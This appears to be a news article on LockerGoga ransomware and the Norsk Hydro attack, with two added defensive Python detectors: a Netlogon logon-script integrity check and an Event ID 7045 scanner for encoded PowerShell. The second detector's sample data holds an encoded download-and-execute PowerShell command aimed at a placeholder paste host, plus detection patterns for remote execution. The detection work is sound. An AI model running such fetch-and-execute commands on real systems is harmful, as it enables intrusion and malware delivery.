LockerGoga: It's not all about the ransom

Updated: In some cases, LockerGoga makes it very difficult to pay blackmail demands to decrypt systems.


Variants of LockerGoga, a form of ransomware which targets industrial systems, have been discovered in which ransom payments appear to be an afterthought rather than the malware's true purpose.

The malware was recently detected at the heart of an attack against Norsk Hydro. The aluminum producer became infected with a strain of the malware which locked its systems and demanded a ransom payment, a demand which was not met.

Instead, Norsk Hydro called out for help and Microsoft, among other IT vendors, answered.

However, the company was still forced to switch to manual processes and could not access customer orders until backups were restored.

LockerGoga is one of many forms of malware in the wild which has attacked industrial systems. Another family of note is Industroyer, malware which ESET says is "specifically designed to attack the power grid" and was responsible for the temporary closure of the power grid in Kiev, Ukraine, in 2016.

According to researchers from the Securonix Threat Research team, LockerGoga variants have provided a glimpse into the malware's capabilities -- as well as some strange programming elements which can make paying a ransom more difficult.

In a blog post on Tuesday, Securonix published a detailed report on the capabilities of LockerGoga strains active today.

The infection vector of LockerGoga has not been verified, but as in many cases of business compromise, it is likely that phishing messages represent the initial stage. The researchers say that Microsoft Word or RTF documents containing embedded, malicious macros are suspected culprits.

Payloads are signed with valid certificates which enable the bypass of traditional security products. The threat actors behind the ransomware use multiple certificate authorities (CAs) to sign the software -- Alisa Ltd., Kitty Ltd., Sectigo, and Mikl Limited -- and some variants of the malware have been equipped with taskkill capabilities in order to disable antivirus systems. Others are additionally able to terminate Windows processes.


Once a system is infected with LockerGoga, some variants will move the payload around networks using the Microsoft Server Message Block (SMB) protocol, while others have been observed using Active Directory management services for the same purposes.

"The most likely attack progression [is] that an initial compromise was followed by manual operator placement and modification of one of the existing logon script entries in the Netlogon directory on an AD resource [...], which allowed the binary to automatically propagate and be executed by users within the organization during a logon session," Securonix says. "It is also possible that the threat actors created a new logon script and added a new logon GPO entry to execute the binary on all of the systems applying the logon script to the organizational unit or the complete organization."
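The propagation path Securonix describes, a modified or newly added logon script in the Netlogon share, is something a defender can watch for with a simple integrity baseline. The following is an added example, not Securonix's or Norsk Hydro's tooling: it hashes every file under a share directory, compares the result against a stored baseline, and raises an alert for any script or executable that appeared or changed. The `demo()` function builds a constructed fake NETLOGON share in a temporary directory and tampers with it in the way the quote describes (an existing `logon.bat` is edited and a new binary appears); all file names and contents in it are invented for the example.

```python
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, List

# File types that run on the client when a logon script references them;
# assumption for this example, extend to whatever your scripts actually use.
SCRIPT_SUFFIXES = {".bat", ".cmd", ".vbs", ".ps1", ".exe"}


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large binaries do not sit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(share_root: Path) -> Dict[str, str]:
    """Map every file under the share (path relative to the root) to its SHA-256."""
    return {
        str(path.relative_to(share_root)).replace(os.sep, "/"): sha256_file(path)
        for path in sorted(share_root.rglob("*"))
        if path.is_file()
    }


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Diff two snapshots; anything executable that is new or changed becomes an alert."""
    added = sorted(name for name in current if name not in baseline)
    removed = sorted(name for name in baseline if name not in current)
    modified = sorted(
        name for name in current if name in baseline and current[name] != baseline[name]
    )
    # A logon script runs on every machine that applies the GPO, so a changed
    # script or a new binary in the share deserves immediate analyst attention.
    alerts = [name for name in added + modified if Path(name).suffix.lower() in SCRIPT_SUFFIXES]
    return {"added": added, "removed": removed, "modified": modified, "alerts": alerts}


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a fake Netlogon share, then tamper with it."""
    with tempfile.TemporaryDirectory() as tmp:
        share = Path(tmp) / "NETLOGON"
        share.mkdir()
        # Constructed baseline content (not a real organisation's scripts).
        (share / "logon.bat").write_text("@echo off\r\nnet use H: \\\\fileserver\\home\r\n")
        (share / "README.txt").write_text("Logon scripts for example.invalid\r\n")
        baseline = snapshot(share)

        # Tampering modelled on the reported pattern: an existing logon script
        # is edited to launch a binary that has been dropped into the share.
        (share / "logon.bat").write_text(
            "@echo off\r\nnet use H: \\\\fileserver\\home\r\n"
            "start /b \\\\dc1\\NETLOGON\\unknown.exe\r\n"
        )
        (share / "unknown.exe").write_bytes(b"MZ-constructed-placeholder")

        return compare(baseline, snapshot(share))


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:9}: {value}")
```

In production the baseline would be written once from a known-good state and re-checked on a schedule (or from a file-share audit event), and the alert list would feed the SIEM; the comparison logic itself does not change.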

Anti-virtual machine (VM) and sandbox evasion techniques, albeit primitive ones, are also in play.

The malware then begins its work. LockerGoga focuses on encrypting files with popular extensions including .doc, .xml, .ppt, and .pdf using AES-256 keys, and appends the .LOCKED extension to the encrypted files.

The main thrust of the malware is to infect and encrypt. However, some LockerGoga variants have an odd quirk which can make it harder for victims to pay their ransom demand.

In some strains, the malware will change administrator passwords and log victims off their system using logoff.exe.

"This indicates that the attackers' objectives may have included additional goals that are not part of a traditional ransomware modus operandi, such as cybersabotage," the team says.


Taking down core, critical services can have catastrophic real-world consequences, and such disruption can be a tempting lure for threat actors. It seems that in LockerGoga's case, we are likely to see more examples of the malware in the wild given FIN6's decision to start deploying both Ryuk and LockerGoga ransomware strains on the networks of compromised companies.


Oleg Kolesnikov, Director of Threat Research at Securonix told ZDNet:

"One of the reasons that LockerGoga was so impactful in the Norsk Hydro attack was its scale. It infected multiple systems through copying to the shared directory and subsequent lateral movement, affecting the entire organization.

This lateral movement is a technique that hasn't been used commonly in other attacks so it's not something that companies are used to detecting for, but should be included in protocols for future detection."

Update 14.17 BST:

"I believe the threat actors that deploy LockerGoga are financially motivated but have been more disruptive lately, likely in an effort to make victims feel like they have no better option but to pay," Charles Carmakal, VP of Mandiant, told ZDNet. "I know many organizations that pay threat actors. Unfortunately sometimes the more chaotic the intrusion, the more vulnerable victims feel."

In addition, Carmakal described two FIN6-related intrusions taking place earlier this year. In one case, the hackers were booted out of their target system within two hours, and Mandiant believes that given the opportunity, the group would have dropped LockerGoga. In another, the cybersecurity firm was called in after FIN6 managed to drop the malware.

FIN6 used PowerShell commands and a Cobalt Strike HTTPS stager in these cases to infiltrate the networks. The group has added both Ryuk and LockerGoga to their itinerary.

"FIN6 used encoded PowerShell commands to install Cobalt Strike on compromised systems," Mandiant said. "The attacker made use of Cobalt Strike's 'psexec' lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell. In some cases, the encoded PowerShell commands were used to download and execute content hosted on the paste site hxxps://pastebin[.]com."

In some environments, LockerGoga appears to spread through a series of batch scripts which stop services, copy the ransomware, and execute it remotely using psexec.
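The behaviour Mandiant describes, a service installed under a random 16-character name whose image path runs encoded PowerShell, leaves a distinctive trace in the Windows System log (Event ID 7045, "A service was installed in the system"). The following is an added detection example, not Mandiant's, Securonix's or Cobalt Strike's code: it scores service-install records, decodes any `-EncodedCommand` payload so an analyst can read it, and flags records that combine the random-name pattern with encoded PowerShell or that fetch and evaluate remote content. The event records, service names and the encoded command are all constructed for the example; the field labels follow the event's own (`ServiceName`, `ImagePath`), and the `example.invalid` host is a placeholder.

```python
import base64
import re
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...);
# the group captures the base64 argument that follows it.
ENCODED_FLAG = re.compile(r"(?i)\s-e(?:[nc][a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
# Service names of exactly 16 alphanumeric characters, as in the reported psexec pattern.
RANDOM_NAME = re.compile(r"^[A-Za-z0-9]{16}$")
# Decoded commands that pull and run remote content are the second half of the pattern.
REMOTE_EXEC = re.compile(r"(?i)downloadstring|invoke-webrequest|\biex\b|invoke-expression")


def decode_powershell(b64: str) -> Optional[str]:
    """-EncodedCommand takes base64 of UTF-16LE text; return None if it is not that."""
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def looks_random(name: str) -> bool:
    """16 alphanumerics with digits and both letter cases; a crude but cheap filter."""
    return (
        bool(RANDOM_NAME.match(name))
        and any(ch.isdigit() for ch in name)
        and name != name.lower()
        and name != name.upper()
    )


def assess_service_install(event: Dict[str, str]) -> Dict[str, object]:
    """Score one Event ID 7045 record and return the reasons plus any decoded command."""
    name = event.get("ServiceName", "")
    image = event.get("ImagePath", "")
    reasons: List[str] = []
    decoded: Optional[str] = None

    if looks_random(name):
        reasons.append("16-character random-looking service name")
    match = ENCODED_FLAG.search(image)
    if match:
        reasons.append("encoded PowerShell in ImagePath")
        decoded = decode_powershell(match.group(1))
    if decoded and REMOTE_EXEC.search(decoded):
        reasons.append("decoded command downloads or evaluates remote content")

    # Encoded PowerShell launched as a service is suspicious on its own; the
    # random name by itself only becomes interesting alongside another signal.
    suspicious = "encoded PowerShell in ImagePath" in reasons or len(reasons) >= 2
    return {"service": name, "suspicious": suspicious, "reasons": reasons, "decoded": decoded}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return the suspicious 7045 records from a list of parsed event dictionaries."""
    results = (assess_service_install(e) for e in events if e.get("EventID") == "7045")
    return [r for r in results if r["suspicious"]]


def _encode(command: str) -> str:
    # Builds the constructed sample the same way PowerShell expects the argument.
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample records (invented values, not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "7045", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": "7045", "ServiceName": "aK3pQz9Lm2XwRt7Y",
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -enc "
                  + _encode("IEX (New-Object Net.WebClient).DownloadString("
                            "'https://paste.example.invalid/constructed')")},
    {"EventID": "7045", "ServiceName": "WindowsUpdateSvc",
     "ImagePath": r"C:\Program Files\Vendor\updater.exe"},
]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["service"], hit["reasons"])
        print("  decoded:", hit["decoded"])
```

Note that `WindowsUpdateSvc` is also 16 characters long, which is why the name check alone is not treated as an alert; pairing it with the image path is what keeps the false-positive rate tolerable.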
